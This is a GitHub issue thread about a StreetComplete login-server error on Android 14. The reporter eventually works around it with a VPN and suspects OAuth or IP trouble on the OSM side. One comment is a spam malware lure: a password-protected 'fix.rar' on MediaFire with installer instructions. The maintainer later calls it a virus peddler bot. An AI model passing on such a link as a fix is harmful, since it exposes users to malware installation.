### ISSUE TITLE
Login-Server kann nicht erreicht werden

### ISSUE THREAD

**Issue by clamyahoo** [streetcomplete/StreetComplete#5845]
![Screenshot_20240826_165645_StreetComplete](https://github.com/user-attachments/assets/395d7f59-04d5-46e8-971e-412a5d74d11f)

.
**How to Reproduce**
-Install the app on Android 14
- Login (that works, you can consult your osm profile)
- make a change
- - Try to start the upload of the change by tapping again on your profile

**Expected Behavior**
the  login (Anmelden) starts but stops and it says "Login-Server kann nicht erreicht werden" / the Login server can't be reached. 

**Versions affected**
Android 14
StreetcompleteV58.02

**Comment by westnordost** [comment]
> Try to start the upload of the change by tapping again on your profile

That's not how you upload changes. What did you do exactly?

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by clamyahoo** [comment]
Hi, thank you for your replies, now it works again 🙈 But before, it really didn't and I changed connections and anything else, it wasn't for something on my side. Sorry!

**Comment by westnordost** [comment]
(Deleted the comment from the virus peddler bot)

**Comment by westnordost** [comment]
Okay, great!

**Comment by clamyahoo** [comment]
Sorry, it happens again, here a screenrecord

https://github.com/user-attachments/assets/d1fe6cbd-556f-44f7-b468-857ee5302f53

**Comment by westnordost** [comment]
What happens when you login to OSM in another editor, e.g. Vespucci?

**Comment by clamyahoo** [comment]
Finally I managed to resolve it for Streetcomplete using a VPN app and now it works also the normal way.
I think it had to do with the OAuth process. I hadn't used Streetcomplete and Vespucci for nearly a year. In the meantime, I had changed the password. Now Streetcomplete asked me again to establish the connection. I tried it with the Google third party access but there was something strange happening that I didn't understand and then I was connected but still had to do the OAuth process which didn't work. Later, as I wrote, it worked all of a sudden. Then I reinstalled Streetcomplete via F-Droid and then the error appeared again and then also when I retried it via Google Playstore. So I thought that maybe OSM just didn't like being contacted so often from the same IP. And there we are: I tried it with a VPN connection and now it works. The same thing happened also with Vespucci this morning, so I think it must have come from the OSM side.
My OSM account shows me also that both apps are accepted and have been used since yesterday.
This authentication business is really complicated ...
